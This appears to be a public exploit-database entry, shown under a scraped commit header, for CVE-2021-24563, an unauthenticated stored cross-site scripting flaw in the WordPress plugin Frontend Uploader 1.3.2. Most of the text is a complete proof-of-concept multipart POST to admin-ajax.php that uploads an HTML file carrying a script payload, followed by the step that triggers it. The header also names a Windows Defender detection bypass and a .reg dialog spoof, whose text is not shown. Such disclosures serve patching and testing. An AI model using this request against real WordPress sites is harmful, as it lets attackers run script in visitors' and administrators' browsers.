00e20a3a1c
3 changes to exploits/shellcodes Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass Microsoft Windows Defender - Detections Bypass WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
118 lines
No EOL
2.6 KiB
Text
118 lines
No EOL
2.6 KiB
Text
# Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
|
|
# Date: 10/01/2022
|
|
# Exploit Author: Veshraj Ghimire
|
|
# Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/
|
|
# Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/
|
|
# Version: 1.3.2
|
|
# Tested on: Windows 10 - Chrome, WordPress 5.8.2
|
|
# CVE : CVE-2021-24563
|
|
|
|
# References:
|
|
|
|
https://www.youtube.com/watch?v=lfrLoHl4-Zs
|
|
https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1
|
|
|
|
# Description:
|
|
|
|
The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly
|
|
|
|
|
|
# Proof Of Concept:
|
|
|
|
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
|
|
Accept-Language: en-GB,en;q=0.5
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------124662954015823207281179831654
|
|
|
|
Content-Length: 1396
|
|
|
|
Connection: close
|
|
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
|
|
-----------------------------124662954015823207281179831654
|
|
|
|
Content-Disposition: form-data; name="post_ID"
|
|
|
|
|
|
1247
|
|
|
|
-----------------------------124662954015823207281179831654
|
|
|
|
Content-Disposition: form-data; name="post_title"
|
|
|
|
|
|
test
|
|
|
|
-----------------------------124662954015823207281179831654
|
|
|
|
Content-Disposition: form-data; name="post_content"
|
|
|
|
|
|
test
|
|
|
|
-----------------------------124662954015823207281179831654
|
|
|
|
Content-Disposition: form-data; name="files[]"; filename="xss.html"
|
|
|
|
Content-Type: text/html
|
|
|
|
|
|
<script>alert(/XSS/)</script>
|
|
|
|
-----------------------------124662954015823207281179831654
|
|
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
|
|
upload_ugc
|
|
|
|
-----------------------------124662954015823207281179831654
|
|
|
|
Content-Disposition: form-data; name="form_layout"
|
|
|
|
|
|
image
|
|
|
|
-----------------------------124662954015823207281179831654
|
|
|
|
Content-Disposition: form-data; name="fu_nonce"
|
|
|
|
|
|
021fb612f9
|
|
|
|
-----------------------------124662954015823207281179831654
|
|
|
|
Content-Disposition: form-data; name="_wp_http_referer"
|
|
|
|
|
|
/wordpress/frontend-uploader-form/
|
|
|
|
-----------------------------124662954015823207281179831654
|
|
|
|
Content-Disposition: form-data; name="ff"
|
|
|
|
|
|
92b6cbfa6120e13ff1654e28cef2a271
|
|
|
|
-----------------------------124662954015823207281179831654
|
|
|
|
Content-Disposition: form-data; name="form_post_id"
|
|
|
|
|
|
1247
|
|
|
|
-----------------------------124662954015823207281179831654--
|
|
|
|
|
|
|
|
Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html |